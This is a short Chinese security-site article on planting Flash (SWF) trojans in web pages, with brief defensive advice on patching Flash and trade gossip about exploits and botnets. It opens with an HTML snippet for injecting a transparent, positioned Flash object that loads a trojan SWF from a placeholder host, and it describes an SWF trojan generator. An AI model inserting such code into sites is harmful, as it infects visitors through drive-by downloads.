在需要挂马的网页中插入:
<DIV style="POSITION: absolute;left: 00px">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="700" height="500">
<param name="movie" value="http://www.xxx.com/MuMa.swf SWF木马网址">
<param name="wmode" value="transparent">
<embed src=" http://www.xxx.com/MuMa.swf SWF木马网址" type="application/x-shockwave-flash">
</embed>
</object>
</DIV>
此外,黑客还可以使用SWF木马生成器来挂马。在生成器中输入自己指定的木马下载地址,然后点击“生成”按钮,将生成恶意的SWF文件插入需要挂马的网页中(如图)。
防安全工程师在处理SWF挂马时,首先升级Flash的版本,打上相关的安全补丁,堵住安全漏洞,并会使用一些监控工具,监控公司客户机常用软件的升级情况。此外,还可以使用一些能拦截网页挂马的安全辅助工具等。
安全八卦:由于Flash漏洞的危害性,当漏洞利用程序出现时,在黑客圈甚至被炒到数万元,但仍不乏购买者。与此同时,Flash漏洞的曝光,也让黑客圈内的肉鸡交易再次火爆,在黑客常用的IRC聊天频道中,肉鸡以数千甚至上万的数量进行批量交易。
转截请注明:文章来自 pc捍卫者 http://www.pchwz.com
本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点